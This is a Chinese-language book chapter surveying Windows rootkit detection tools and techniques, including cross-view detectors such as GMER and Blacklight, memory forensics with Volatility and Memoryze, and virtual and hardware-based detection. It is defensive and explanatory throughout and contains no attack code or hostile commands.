现在互联网上有许多防Rootkit应用程序。所有的主流商业防病毒供应商都将防Rootkit集成到他们的工具中或者免费提供。当防Rootkit应用程序刚刚发行时,它们最关注概念验证性的思路来帮助解决检测的问题。例如,VICE是一个通过解析内核SSDT或者用户模式中的函数指针并且确认它们指向正确的应用程序来检测钩子的免费工具。例如,如果从SSDT中解析的地址指向test.sys,而应该指向的是ntoskrnl.exe,那么可能是因为Rootkit挂钩了这个函数。如何知道SSDT中的具体项目是否指向ntoskrnl.exe?你只要枚举注册到OS的驱动程序列表,并且将SSDT中的函数指针地址与驱动程序的基地址和结束地址比较即可。如果SSDT中的值在驱动程序的地址范围之内,那么它位于驱动程序之中。如果你没有找到那个地址的驱动程序,那么可能就是一个Rootkit。 当VICE第一次发布时,它是独一无二的,因为它实现了一种人们前所未见的新技术;它检测用户模式和内核模式钩子并且能够发现常规的IAT钩子、嵌入函数钩子和SSDT钩子;但是,VICE很复杂,不是很友好并且不能清除所发现的Rootkit。本小节中讨论的大部分应用程序都与VICE相似。目前达到最终用户能够有效利用的水平的工具非常少。 许多工具仍然非常难以理解,造成许多假阳性,不能正确地清除或者隔离,这些都使最终用户更加痛苦。基于软件的Rootkit检测程序与其他检测程序一起使用并且具有某些方向时是有益的。例如,一个工具能检测某些其他工具不能检测的Rootkit,或者一个工具可能部分地删除一个项目,而另一个工具能够删除更多的文件或者注册表键值从而更加彻底地删除Rootkit。运行每个工具(大部分是免费的)是正确检测和删除Rootkit的最佳方法。我们建议使用业界杂志、业界专家或者安全公司评级较高的工具。 10.5.1 实时检测与脱机检测 在讨论可用的Rootkit检测工具之前,我们必须解释进行这一分析的背景。在数字取证界,实时(live)和脱机(offline)这两个术语分别代表是在可疑的系统上进行分析,还是在实验室中可疑系统的复制品上进行分析。实时取证在搜集证据的同时进行分析——在系统启动、运行和可以采集内存的同时。实时系统也能收集恶意软件或者Rootkit仍在运行中的更加全面的数据,能够反映诸如从目录读取或者将文件写入磁盘这样的实质性操作。这些数据还包括了在实时分析期间捕捉到的系统内存变化。脱机分析在取证界通常被称为deadbox取证,包括了首先在真实环境中收集数字化证据,然后在另一台机器上分析这些证据。 这两种分析的重要区别在于完成分析的场所。如果按照实时风格在可疑系统上进行分析,那么恶意软件有机会污染证据从而污染分析。我们已经讨论过,Rootkit能够简单地对命令行工具如netstat(列出入站和出站网络连接、路由表和各种网络相关状态)隐藏它们的进程。因此,如果取证研究人员依靠在带有Rootkit的可疑系统上运行netstat,分析就很有可能不正确或者被有意地误导。 Rootkit检测和取证分析具有同样的局限性:实时检测可能几乎总是会被驻留的Rootkit所击垮。因此,实时与脱机的思路与本小节中讨论的Rootkit检测工具所使用的方法的选择有一些关联(有些工具采用了混合的方法)。实时与脱机的争论也是军备竞赛讨论的焦点,因为成功的Rootkit检测最终取决于一点:哪一方首先在系统上安装或者执行。而且,脱机分析的实现要难得多,因为你不能得益于操作系统对分析结构、访问数据类型等的帮助。所有操作系统执行的功能都必须在一个工具中重建,使脱机分析能够类似于实时分析。 10.5.2 System Virginity Verifier System Virginity Verifier(SVV)是Joanna Rutkowska编写的一个工具,采用一个独特的方法来确定系统上是否有一个Rootkit。SVV检查关键的操作系统要素的完整性以发现可能的入侵。因为系统上的每个驱动程序和可执行程序都由多个数据类型组成,SVV将分析二进制文件的代码部分,这里包含了所有可执行代码如汇编指令,SVV还将分析二进制文件的文本段,这里包含了所有字符串如模块名称、函数名称或者按钮和窗口标题。SVV将分析并且把装入内存的内核模块的代码和文本段与文件系统上的物理表现进行比较,如图10-2所示。如果在物理文件和映像或者内存中发现的文件副本之间发现了差异,SVV确定变化的类型并且生成感染级别警告。感染级别帮助用户识别修改的严重程度,并确定修改是否恶意。 图 10-2 System Virginity Verifier比较磁盘和内存中的驱动程序 尽管这个工具最后更新于2005年,而且必须从命令行运行,但是仍然很有效,并且能够帮助技术型用户理解所生成的输出。而且,SVV还论证了一些Rootkit检测工具所碰到的问题,如在内核模式中读取其他内核和用户模式应用程序所用的内存。读取内存看上去好像是简单的操作,但是有几个项目会导致问题: ·__try/__except的使用将不能保护系统免遭未分页内存中的页面错误。 ·MmIsAddressValid()的使用将引入一个竞争并且无法访问交换内存。 ·MmProbeAndLockPages()的使用可能由于各种原因使系统崩溃。 这意味着什么?本质上,对于任何应用程序,访问不属于自己的内存,即使在只读状况下也是不可靠的。这使得可靠地分析装入内存的Rootkit非常困难。分析内存的唯一可靠方法是进行脱机内存转储。 10.5.3 IceSword和DarkSpy IceSword和DarkSpy也是污染视图方法的检测程序,但是它们要求大量的用户交互。例如,当前运行进程和装入内核模块的分析可以在环境改变时(例如用户打开一个Web浏览器)由客户刷新(见图10-3)。尽管这些工具非常精确和详细,但是难以使用,需要高级的技巧。IceSword用于在真实机器上的取证分析过程中研究未知恶意软件的工作原理。 图 10-3 IceSword报告的装入内核驱动程序列表 IceSword的特别之处在于,它使用户能够用几种不同的方式观察系统,以便确定Rootkit的存在。如图10-4所示,IceSword允许用户真正地浏览文件系统或者注册表来发现差异,而不是自动地尝试确定污染视图和可信视图之间的差异。 图 10-4 IceSword允许查找Rootkit隐藏的信息 你可以在图10-4中看到,注册表不能看到名为Rootkit的键值,但是IceSword可以通过它与注册表的接口看到。人工比较使用一个函数调用和另一个函数调用的注册表,需要对Rootkit在注册表键值或者文件中的藏身之所的深入理解。不过,使用NTFS中的备用数据流或者高级的注册表隐藏方法可能击败IceSword。 除了IceSword的手工特性之外,图10-4还展示了一些IceSword的高级技术,用于确保Rootkit无法隐藏。例如,图10-4中显示的窗口标题为“zqxo110387”,这是应用程序创建的随机值。IceSword将随机地为窗口和文件创建新名称,并且将其可执行文件的其他区域随机化,以抢先于攻击者。 IceSword并不完美,即使使用人工检查,Rootkit也能避免被发现。在图10-5中,IceSword列出了装入到内存的内核模块;但是,我们为这个例子安装的Rootkit.sys没有被列出,而我们知道它正在运行,这是因为Rootkit对注册表隐藏了自身。 图 10-5 IceSword尽管强大,却没有发现这个Rootkit 10.5.4 RootkitRevealer RootkitRevealer是最早发行的用户友好工具之一。这个工具由SysInternals(已经被Microsoft收购)的Bryce Cogswell和Mark Russinovich编写,使用交叉视图方法,仅关注文件系统和注册表。这个工具的好处是快速、简单而有效。用户只要运行这个工具,选择File|Scan,然后等待系统分析。举个例子,图10-6中,尽管RootkitRevealer没有扫描装入的内核模块,但快速地检测隐藏的注册表键值以及Rootkit隐藏的文件。 10.5.5 F-Secure的Blacklight F-Secure的Blacklight实施了前面提到的污染或交叉视图(cross-view)方法,是第一种这么做的工具,提供简单、清晰和友好的用户界面。F-Secure是一家防病毒公司,在他们的商业产品中也采用了Blacklight。他们的网站上有一个免费的版本。尽管专门编写以避免或者绕开依赖污染视图方法的检测框架的Rootkit已经可以绕过Blacklight,但是它仍然有用,因为你可以通过改名和重启来“隔离”隐藏的文件,这应该能够阻止Rootkit装入。缺点是,你不能改这些文件名,因为Blacklight自动进行这项工作。图10-7给出了一个例子。 图 10-6 RootkitRevealer能帮助寻找隐藏的Rootkit 图 10-7 Blacklight:简单而有效的界面减少了用户的决策数量 这个工具的特殊之处在于,当它第一次发行时,使用了一种新颖的方法来检测隐藏进程的DKOM Rootkit。Blacklight并不简单地依靠进程列表如PspCidTable的不同视图,而是对每个可能的PID进行简单模式匹配(bruteforce),试图用OpenProcess()函数打开PID。如果OpenProcess()成功而PID没有出现在PspCidTable或EPROCESS列表中,这个进程极有可能被有意隐藏。 随着军备竞赛加剧,Rootkit开发人员已经找到新的绕过Blacklight和其他Rootkit检测工具的方法,F-Secure已经改变了底层算法和处理方法。F-Secure经常发布Blacklight的新版本并且将新的开发集成到其商业产品中。 10.5.6 Rootkit Unhooker Rootkit Unhooker是高级用户所用的一个工具。它的功能既深又广,但是广度不如稍候讨论的GMER工具。Rootkit Unhooker使用户可以多种方式窥探系统,包括查看SSDT、影子SSDT,不通过OS而直接访问硬盘对文件系统进行低级扫描,查看进程表等。在图10-8中我们能看到,Rootkit Unhooker能够查找Rootkit放置在TCP/IP协议栈中的钩子。 图 10-8 Rootkit Unhooker很强大,需要对操作系统的深入理解 只要鼠标右键单击,选择UnHook Selected,你就可以删除Rootkit的TCP/IP过滤。图10-9显示Rootkit被禁用,代码钩子被删除。Unhooker能够快速地删除Rootkit的功能而继续操作,甚至不需要删除Rootkit本身,这显著地降低了感染的影响。而且,研究人员在取证调查中试图确定Rootkit中的每一个和每一类功能,在这个领域Rootkit Unhooker能够提供帮助。在这种情况下,研究人员可能希望禁用钩子,但是仍然将驱动程序留在内存中以供分析。 除了禁用或者删除感染的方法之外,Rootkit Unhooker还提供了导致蓝屏死机(BSOD)的功能。这很重要;取证调查可能希望通过机器的串行口或者USB接通调试程序(如WinDBG),通过强制蓝屏死机,得到崩溃时所有内存的一个副本。调查者接下来可以进行脱机内存分析来了解更多Rootkit的情况。 但是Rootkit Unhooker很复杂,功能丰富而且输出非常繁杂,它也不稳定;并且在某些机器上,当你试图关闭应用程序或者进行一些恶意软件删除操作(例如去除函数钩子或者清除一个文件)时会导致BSOD。如果在BSOD的同时,系统有实际的磁盘活动,就有可能使系统无法启动。 图 10-9 Rootkit Unhooker可能发现不常见的钩子技术 10.5.7 GMER GMER是为高级的非专业用户所开发的。它在单一工具中提供了每种可能的Rootkit检测方法。GMER还提供了有限的清除能力。而且,它经常更新,由社区支持,许多防Rootkit倡导者都将其推荐给试图确定系统是否感染的用户。特别是,GMER在启动时立即开始扫描系统。GMER寻找隐藏文件、进程、服务,以及被挂钩的注册表键值。GMER具有每种其他Rootkit检测工具的特性并且自动化其使用。图10-10展示了一个GMER在没有任何用户交互下装入的实例。 如图10-10所示,感染立即被发现并且用色彩编码告知用户必须立即处理这个问题,并且可能进行深入的系统扫描。GMER容易使用,并为技术型的用户提供所需的工具,这都加速了它的广泛使用。如果你希望调查一个隐藏的服务,GMER能够通过调整注册表禁用它。其他Rootkit检测工具使用删除隐藏文件之类的清除方法,GMER在这方面也能做得很好。与Rootkit Unhooker相似,GMER也允许用户执行注册表或者文件系统的低级扫描,操作界面很熟悉,如图10-11所示。低级分析意味着GMER不采用常见的API并且通过存储在硬盘上的文件直接访问注册表。 图 10-10 GMER已经开始工作 图 10-11 GMER进行低级扫描,查找Rootkit 10.5.8 Helios和Helios Lite Helios和Helios Lite是MIEL Labs开发的Rootkit检测工具。这两个工具使用相似的Rootkit检测方法。Helios是一个用于主动检测和修补Rootkit的驻留程序,而Helios Lite是一个独立的二进制程序,能够快速地扫描系统以发现SSDT钩子、隐藏进程、隐藏注册表项和隐藏文件。 Helios Lite使用一个GUI程序与其内核模式驱动程序helios.sys通信。这两个组件一起,能够检测大部分Rootkit钩子和隐藏技术。Helios由一个.NET GUI用户模式应用程序、两个程序库/DLL和一个内核驱动程序chkproc.sys组成。 为了检测隐藏进程,Helios Lite使用前面讨论的交叉视图方法。它通过读取内核结构PspCidTable获得活动进程/线程列表的低级视图。这个表格存储有关运行进程和线程的信息。然后Helios Lite比较存储在表格中的信息和高级Windows API调用的结果,对于任何可能代表隐藏进程的差异做出提示。图10-12显示Helios Lite检测FU Rootkit隐藏的Notepad进程。 Helios使用相同的技术,但是方法不同。Helios试图主动监控和阻止Rootkit感染你的系统。图10-13显示了开始扫描或者主动防御之前的基本用户界面。 图 10-12 Helios Lite 单击On Demand Scan(按需扫描),你可以立即评估系统的完整性。图10-14显示了Helios提供的丰富信息——不仅仅是关于感染的信息,还有Helios确定感染存在的方法。 注意隐藏进程notepad.exe的入口点。Helios报告映像路径(Image Path)字段为空(FU清除了这个字段),很显然这是一个隐藏进程。但是Helios报告的最有用的信息是哪些技术不能看到这个进程而哪个能够成功地发现。ZQSI、Eprocess List和Eproc Enum3个栏目引用Helios用于寻找隐藏进程的交叉视图分析中的3个数据点。第一列是ZQSI,引用Win32 API ZwQuerySystemInformation(),这个API用于从内核或者用户模式获取进程列表。第二列是Eprocess List,遍历EPROCESS链表结构。第三列是Eproc Enum,对所有可能的进程ID号进行简单模式匹配。如果这些数据点中有任何差异,Helios就会报告。这时,你可以单击Unhide将notepad.exe重新链接到EPROCESS列表中。 图 10-13 Helios 图 10-14 Helios查找隐藏进程 Helios真正独特的是主动防御功能。单击Toggle Background Scan(触发后台扫描),Helios将自动轮询系统,观察是否有变化。这使Helios有点像是恶意软件/Rootkit感染的实时报告工具。在Inoculation(免疫)菜单下还有更多的监控功能,包括:Monitor Kernel Module Loading(监控内核模块装入),Block Access to Physical Memory(阻止物理内存访问)和Monitor Access to Files and Applications(监控文件和应用程序访问)。在免费版本中没有完全实现AdvancedDetection(高级检测)和Enable App Protection defense(启用应用程序保护防御)功能。 Helios和Helios Lite都因为有一个巧妙的、由经过验证的研究和大量文档/白皮书支持的用户界面而自豪。极其易于理解的界面设计和功能使其成为任何Rootkit检测工具箱的强有力候选者。 10.5.9 McAfee Rootkit Detective McAfee是首先发行免费Rootkit检测实用程序的商业供应商之一。在2007年发行了Rootkit Detective(在竞争对手F-Secure于2006年发行Blacklight之后不久),McAfee的Avert Labs很快从安全社区中得到赞扬。 Rootkit Detective和它的名字一样是个单纯的工具,使用户能够查看隐藏进程、文件、注册表项、挂钩的服务、IAT/EAT钩子以及detour风格的修补。GUI界面由一个面板组成,上面有可以用来改变活动屏幕的无线按钮。 Rootkit Detective在显示发现的情况时提供了基本的修复功能。图10-15显示了对隐藏的notepad.exe进程可用的基本修补操作:提交、终止和改名。 其他许多免费的Rootkit检测工具可在http://antiRootkit.com获得。 图 10-15 Rootkit Detective 10.5.10 商业Rootkit检测工具 大部分商业(换句话说,你必须花钱才能得到的)Rootkit检测工具都不是最先进的,很容易被最新的Rootkit绕过。原因是商业安全公司不能依靠最新的Rootkit检测技术,因为大部分这种技术对于几百万普通用户都没有足够的可靠性。就算不是每个安全软件公司都如此,但是Rootkit社区中的人们都相信免费的工具Rootkit Unhooker和GMER比它们的商业化对手更好。 而且,由于大部分商业软件供应商源自特征码匹配,他们试图在使用前面提到的技术之前利用特征码方法来识别Rootkit。我们已经在前面的章节中讨论过基于特征码的检测技术的优劣。令人伤心的是,商业化软件供应商都秉承“当你只有锤子,什么看上去都像钉子”的哲学,这意味着如果你只有一种检测方法,任何东西都用这种方法进行检测。 当然,只使用一种方法不会阻止商业软件供应商试图建立一个无人进入的市场。2003年首先露面的HBGary由前Rootkit作者Greg Hoglund创立。作为一个风险减轻市场上的公司,HBGary实际上精通于逆向工程和高级Rootkit检测。它们长期的旗舰产品HBGary Inspector(独立的软件调试程序)在2007年末停产并且集成到新的事故响应产品Responder中。Responder使调查取证人员能够捕捉和分析Rootkit和恶意软件所用的物理内存。HBGary已经成为企业取证分析和Rootkit检测领域中的领先者。 行业中的其他竞争者很快做出反应,控制这个新兴市场的竞争非常活跃。新加入的Mandiant和HBGary等公司开始挑战主流的Guidance Software和AccessData,挑战磁盘取证和粗略的易失性数据分析就足以应付取证调查的思路。企业级产品如HBGary的Responder和Mandiant的Intelligent Response组合了从内存快照中发现高级恶意软件的分析技术。在商业产品中引入这些简单的功能极大地改变了数字取证、恶意软件分析和Rootkit检测的局面。 结果是,2008年免费工具出现井喷,因为每家公司都努力证明自己的恶意软件分析和Rootkit检测能力。这些工具包括: ·HBGary FlyPaper 在内存中查找恶意软件/Rootkit,并且阻止它们卸载或者终止。 ·Mandiant Red Curtain 统计分析程序二进制文件,确定它们的恶意能力,用数字值和色彩代码为每个二进制文件计分,表示二进制文件的恶意可能。它使用了类似熵分析的技术来搜索常见的恶意软件策略,如打包、加密和其他特性。尽管不是新的概念,但是Red Curtain是可以保留在工具箱中的有用的免费工具。 大部分提到过的公司都关注于在内存取证分析领域中开发自己的Rootkit检测能力。 10.5.11 使用内存分析的脱机检测:内存取证的革新 刚才讨论的商业产品中的Rootkit检测和数字取证中的进步,大部分归功于研究领域中对数字取证的兴趣的复苏。这一研究领域被称为内存取证,处理两个广泛的难题: ·内存获取 调查者如何在取证中捕捉物理内存的内容? ·内存分析 获取内存转储后,你如何从大量的数据中提取痕迹和证据。 那么内存取证和Rootkit检测有什么关联呢?答案是内存取证给了你另外一个搜索恶意软件和Rootkit的场所。考虑一下数字取证的情况,传统上,数字取证调查关注于从硬盘和基本的易失性数据(从系统内存中收集的信息,如运行进程的列表,系统时间和标识数据,网络连接等)中获取和分析证据。但是2008年NIST和Volatile的联合研究显示,当前的分析方法所覆盖的只是易失性存储(如物理内存)中可用证据的不到4%(http://www.4tphi.net/fatkit/papers/aw_AAFS_pubv2.pdf)。在法庭上没有可靠和可接受的证据引发了系统安全检查的使用,这种方法用于确保系统处在收集的数据可接受和正确的状态中。 换句话说,数字取证技术不足以发现内存中的恶意软件。而且,随着恶意软件和Rootkit不断发展,它们变得更加隐蔽,大部分隐藏于内存中从而消除了对硬盘的依赖。这迫使取证工具发展,我们从前一小节所讨论的产品发行中可以看到这种发展成为了主流。我们实际上目击了正式的数字取证和难以捉摸的Rootkit检测笨拙的合并。 商业工具无疑不是第一种将内存获取和分析与Rootkit检测技术联姻的工具。我们可以证明,第一个理解这种思路,随后将其带入主流商业公司的社区是数字取证社区。具体地说,2005年中,数字取证研究工作室(Digital Forensic Research Workshop,DFRWS,http://www.dfrws.org)对其社区提出了一个挑战:根据一个物理内存转储重建入侵的时间轴。获胜者之一GMG Systems公司的George M.Garner编写了一个名为KNTList的工具,能够从内存转储中解析信息,重建证据如进程列表和装入的DLL,并且分析内存转储以破译入侵的场景。该工具变得非常流行,以至于GMG Systems将它放入一个数字调查分析工具套件中。它在取证业界成为最受尊敬和最广泛使用的工具之一。 近年来,发行了多个免费的内存获取工具,包括: ·Matthew Suiche开发的Win32dd。 ·Mantech开发的Memory DD(mdd)。 ·Agile Consulting开发的Nigilant32。 几乎所有主要的取证公司都在产品中包含了内存获取功能,但是这些产品大多数在内存转储分析中都有严重的缺失。更著名的一些商业获取工具包括HBGary FastDump和Guidance Software的WinEn,都不是免费的。大部分这些工具都容易理解,所以我们对其功能的使用不做进一步的详细解释。 可用的内存分析工具较少,因为分析是更加困难的过程。但是,我们将介绍两个相当强大的免费工具:Volatile Systems开发的Volatility和Mandiant开发的Memoryze。 Volatility Volatility是一个内存分析环境,具有一个根据Volatile Systems的Aaron Walters的研究开发的可扩展底层工具框架。Aaron被认为是现代高级内存分析技术的奠基人之一。他是FATkit的合著者之一,这篇文章提升了对数字调查过程中内存取证需求的认同。 Volatility的核心包含一个Python脚本库,进行可疑系统的内存转储中存储的数据结构的解析和重建。这种解析的低级细节、重建和表现是从用户提取的,所以不需要Windows操作系统的复杂知识。Volatility还支持其他内存转储格式,包括使用dd得到的未加工内存转储、Windows休眠文件(存储在C:\hiberfil.sys),以及崩溃转储。 Volatility提供从内存转储的基本信息,包括: ·运行中的进程和线程。 ·打开的网络套接字和连接。 ·用户和内核模式中装入的模块。 ·进程使用的资源,如文件、对象、注册表键值和其他数据。 ·转储单个进程或者任何二进制文件的能力。 图10-16显示了使用Volatility核心模块pslist,从一个样例内存转储中解析而得的简单进程列表。 图 10-16 Volatility产生简单的进程列表 然后,这些数据可以由调查人员分析和关联。一般来说,调查人员了解Rootkit或者恶意软件使用的技术(例如,钩子或者修补),所以剩下的就是从Volatility提供的数据中寻找那种技术的证据。 我们不去探究Volatility的内部工作原理,但重要的是理解它用于识别内存转储中的操作系统结构的技术(还使用了其他技术,但是我们只介绍基本的扫描)。Volatility使用其对Windows符号和数据结构的认识,根据唯一定义关键数据结构的字段构建特征码。例如,进程在内存里由EPROCESS数据结构表示。这个结构包含许多其他Windows数据结构不包含的字段。因此,Volatility利用对哪些独特字段定义各种结构的认识,扫描内存查找这些指示。 让我们以老朋友FU为例。在第4章中已经提到,我们知道这个Rootkit的功能之一是使用直接内核对象操纵(DKOM)隐藏进程和模块。具体地说,它修改内存中Windows用于维护项目列表的内核结构。通过直接在内存中修改结构,它自动地污染了所有API函数调用——不管是原生的(也就是ntoskrnl的一部分)还是Win32——它们都从Windows请求那些信息。 然而,DKOM不会影响脱机内存分析。我们前面已经说明过,脱机分析相对实时分析的主要好处是你不必依赖操作系统或者其组件(例如对象管理器)得到信息。相反,你可以自己从内存中提取信息。 你可以向FU Rootkit发出一个隐藏进程的命令。这一操作如图10-17所示。发给FU的命令在命令提示窗口中,结果可以从Windows任务管理器窗口中看到:notepad.exe进程没有列出,但是记事本应用程序明显正在运行。 使用前面提到的一个内存获取工具(这里用的是win32dd),你可以得到物理内存的一个快照,如图10-18所示。 图 10-17 隐藏一个进程 图 10-18 取得物理内存的一个快照 捕捉物理内存之后,你可以使用Volatility的pslist和psscan2模块发现Rootkit隐藏的进程。Pslist模块寻找内存转储中Windows用于维护活动进程列表的数据结构。这个数据结构是一个链表;因此这种扫描技术常被称作列表遍历(list walking)。这种技术的缺点是像DKOM这样的Rootkit技巧能够欺骗扫描程序,因为DKOM从列表中删除项目。关于DKOM如何从内存中的列表删除项目的更多信息请参阅第4章。但是,使用psscan2可以发现隐藏的进程。psscan2以线性的风格扫描内存,搜索EPROCESS数据结构。内存转储中找到的每个EPROCESS结构代表Windows中的一个进程。因此,如果psscan2报告一个在pslist输出中没有看到的进程的EPROCESS结构,那么这个进程可能被隐藏。Pslist和psscan2的输出如图10-19所示。 图 10-19 pslist和psscan2的输出 注意,记事本应用程序的进程notepad.exe在pslist的输出中没有显示,但是出现在psscan2的输出中。这种差异应该能立即提醒分析人员对这个进程做进一步调查。理解了每个模块背后的扫描技术的缺点,分析人员能够得出结论,即DKOM风格的Rootkit手段正在起作用。 分析人员的下一步是使用Volatility的procdump模块检查notepad.exe进程。这个模块将解析、重建并且转储进程映像到一个二进制执行文件,这个文件可以在一个调试程序中进一步分析。调试程序将为调查人员提供可疑程序功能的最低级视图。 用插件扩展Volatility的能力 Volatility的真正能力在于它的可扩展框架,调查人员能够使用这个框架的核心功能编写自己的插件。插件是依赖Volatility核心模块提供的基本类和功能的较高级模块。 实际上,Volatility进行了艰苦的挖掘工作并将数据揭示给分析人员,分析人员的任务是做出有关这些数据的有意义的结论。出于这个目的,自从Volatility 1.3发行之后编写了许多插件,包括检测高级代码注入和Rootkit、bot、蠕虫存在的插件。这种可扩展性使调查人员能够实施研究人员可能没有时间在代码中实际实现的检测技术。 这个框架的能力的一个实例是Michael Hale Ligh(http://mnin.blogspot.com/2009/01/malfind-volatility-plug-in.html)编写的Malfind插件。这个插件能检测使用代码注入隐藏系统上的存在的一类恶意软件。这个模块检测的恶意软件通常采用的技术是,将一个恶意DLL注入到目标进程,然后修改该进程的映像,删除和/或清除某些将其存在暴露给ProcessExplorer(一个免费工具,提供类似Windows任务管理器的功能)之类的诊断工具的内部结构。 Malfind插件依赖于检测注入代码所使用的内存。这段内存的地址存储于被称作虚拟地址描述符(Virtual Address Descriptor,VAD)的数据结构中。当进程创建时,会得到大量的虚拟内存供整个生命期使用。然而,进程很少使用所有可用空间,所以Windows维护一个进程实际使用的地址列表。这个列表存储在单独的进程中一个被称为VAD树的结构中,树中的每个节点是所用内存的一个位置的地址(单独的VAD)。VAD树是分析人员检查的一个极好资源,因为装入的恶意软件从设计上必须使用这个结构,而且不能在不退出运行的情况下清除或者删除其项目。 当Malfind运行时,它使用Volatility核心模块输出的VAD信息检测内存中恶意软件/Rootkit使用的这些位置。 Malfind和其他Volatility插件说明了Volatility框架中极大的分享和协作机会。尽管Malfind是由Michael Hale Ligh开发的,但是背后的技术是根据Brendan Dolan-Gavitt关于虚拟地址描述符(VAD)的研究。Volatility框架提供的协同使领域调查人员能够利用和实现取证研究社区产生的思路。 Volatility不断扩展的列表在http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins上维护。 Memoryze 与Volatility的脱机特性相反,Mandiant Memoryze是一个在内存转储和真实系统上都能寻找Rootkit和恶意软件的内存分析工具。因为我们已经介绍了使用Volatility进行脱机内存分析,所以对Memoryze在这一领域的功能只简单提及。Memoryze是基于它们的旗舰产品Mandiant Intelligent Response(MIR)的代理组件开发的。 Memoryze有多个组件: ·XML audit scripts Mandiant将其称为执行脚本或者审计脚本,作为Memoryze程序的配置文件。这些脚本中有7个定义了各种分析功能的参数。 ·Memoryze.exe 这个二进制程序从XML设置文件中读取配置数据,并且导入必要的程序库/DLL进行分析。 ·批处理脚本 这些DOS批处理脚本是为了方便用户。用户可以执行这些批处理脚本交互地填写XML审计脚本设置。审计脚本中的所有功能都通过命令行开关输出给这些批处理脚本。 ·核心程序库 这些DLL提供程序中使用的低级分析功能。 ·第三方程序库 这些DLL是来自源程序,如用于正则表达式搜索的Perl Compatible Regular Expressions(PCRE)和用于压缩的ZLIB。 ·内核驱动程序 Mandiant内核程序库生成一个内核驱动程序mktools.sys,并在Memoryze.exe成功执行时将其插入程序的目录。这个驱动程序为应用程序提供内核模式组件,大部分数据在这里收集以供之后的分析。 Mandiant不仅提供了你在Volatility中看到的各种功能,还提供了更多的实时分析功能,包括: ·获取全部或者部分物理内存,包括单独进程的地址空间。 ·从用户模式转储程序二进制文件,从内核模式转储驱动程序。 ·有关活动进程的信息,如打开的句柄、网络连接和嵌入字符串。 ·通过SSDT、IDT和驱动程序IRP表中的钩子检测进行Rootkit检测。 ·枚举系统信息,如进程、驱动程序和DLL。 Memoryze以XML格式报告其结果,这种格式可以由Mandiant的Audit Viewer之类的XML查看器使用。此外,XML报告也可以在任何现代浏览器中查看。 为了检测本章较早的实例中隐藏的进程,我们只要执行不带参数的Process.bat批处理脚本。这个批处理脚本填写XML审计脚本ProcessAuditMemory.Batch.xml,然后启动带有必要开关的Memoryze.exe。XML报告显示了notepad.exe进程;但是它没有指出该进程是隐藏的。因此,分析人员必须对所寻找的东西有一定的概念,才能最大限度地利用这个工具的特性。 尽管Memoryze提供内存获取功能,但是我们已经讨论过了多个开源的替代产品。Memoryze的主要优势是在真实系统上进行分析的能力。有些人可能认为这是一个缺点,因为进行实时分析容易使工具遭受真正的Rootkit和恶意软件的主动欺骗。确实,这是Volatility的脱机分析模型背后的设计思想之一。钩子检测不是Volatility的固有功能;但是可扩展的框架为分析人员提供了自己开发这样的检测插件的功能。 10.6 虚拟Rootkit检测 在第5章中,我们讨论了虚拟Rootkit是Rootkit空间中即将到来的趋势,但是它们真的像看上去那样无法检测吗?2007年底斯坦福大学和卡内基梅隆大学发布的论文《Compatibility IsNot Transparency:VMM Detection Myths and Realities》(兼容性不是透明性:VMM检测的神话和现实)揭穿了虚拟Rootkit无法检测的神话。研究人员总结出制作一个完全仿真硬件的虚拟机器管理程序是根本不可行的。如果建立完美的VM Rootkit是不可行的,那么你如何检测呢?这一研究可能是不精确的(只有时间能告诉我们),它关注于许多研究人员、用户和系统管理员使用VMM检测来确定是否安装了虚拟Rootkit这一事实。这种检测的前提是如果一台机器是支持VMM的,但是没有运行虚拟化,那么,如果检测到VMM,它就肯定是一个Rootkit。 大部分VMM检测很简单并且依赖于已知的虚拟化硬件的检测、资源或者时间攻击。例如,如果网卡是特殊类型的(如VMWare或Virtual PC),表示OS运行在VMM下,这可能意味着OS也被一个Rootkit所控制。 这种想法是有缺陷的,主要是因为现实的IT世界正在快速地转移到虚拟化,2007年的研究反映了这一事实。未来,VMM运行于服务器或者工作站上将会有更加合理的原因。简单地检测操作系统是否运行于一个系统管理程序之下,将不足以证明Rootkit已经控制了你的系统。 除了VMM检测,没有很多其他的技术能够帮助确定虚拟的Rootkit(如BluePill)正在运行。大部分的攻击的执行可能只是为了确定是否有VMM。 10.7 基于硬件的Rootkit检测 所有前面讨论过的防Rootkit解决方案都是基于软件的,但是创建软件来删除恶意软件非常困难,因为两个软件必须争夺相同的资源和设备。如果基于软件的Rootkit检测无效,那么实施基于硬件的Rootkit检测会如何呢?有一个公司这么做了。Komoku由美国国防高级研究计划局(DARPA)、国家安全部以及海军于2004年创立,负责建立硬件和软件Rootkit检测解决方案。Komoku创建了一个基于硬件的解决方案CoPilot,这是一个高保障的PCI卡,能够在硬件级别监控主机的内存和文件系统。CoPilot在工作站或者服务器上近乎实时地扫描和评估操作系统,寻找的是反常行为而不是查找具体的Rootkit。 美国政府声明基于PCI的Rootkit检测器已经成功,但是因为CoPilot是由美国政府投资的,所以不能让公众订购。而且,由于Microsoft于2008年3月收购了Komoku,许多人相信Microsoft不会继续开发CoPilot。 2004年,Grand Idea Studios创建了一个能够从真实系统中捕捉RAM的PCI扩展卡;这个产品获得了美国的专利,被称为Tribble,由Brian Carrier和Joe Grand(Kingpin of L0pht fame)制作。Tribble是一个能够捕捉真实系统的RAM以供分析的PCI扩展版,但是不作商业销售。 2005年,BBN Technologies开发了一个硬件设备,可以插入到服务器或者工作站获得RAM的一个副本以供分析。尽管这个工具允许从实时运行的系统上提取RAM,但是不知道它是否提供了内存映像的自动分析。我们知道RAM捕捉工具仅仅捕捉而不警告或者阻止恶意软件装入RAM。 尽管在硬件内存获取和Rootkit检测中有这些进步,但仍然有很多需要做的。在2007年,Joanna Rutkowska证明了即使使用硬件检测,特别制作的Rootkit仍然能躲开检测。使用AMD64平台,Joanna展示了一个Rootkit在理论上能够向一个硬件设备提供不同的CPU和内存视图,因此可能避开或者删除Rootkit本身的特征并且躲开检测。尽管硬件检测是最好的解决方案,但是到2009年6月还没有可供购买的产品。目前,所有基于硬件的检测方法都只用于特定的政府机构。 我们前面提到过,因为内存不断变化所以内存分析非常困难。许多新的硬件方法开始寻求新的途径,以获得精确而且可靠的内存快照,同时不干扰系统。而且,由于操作系统持续地变化,在脱机内存转储中必须进行分析的未写入文档和写入文档的结构数量也在增加。这些工具需要更多的研究和开发,而人工分析的部分将需要越来越多的必要知识。 10.8 小结 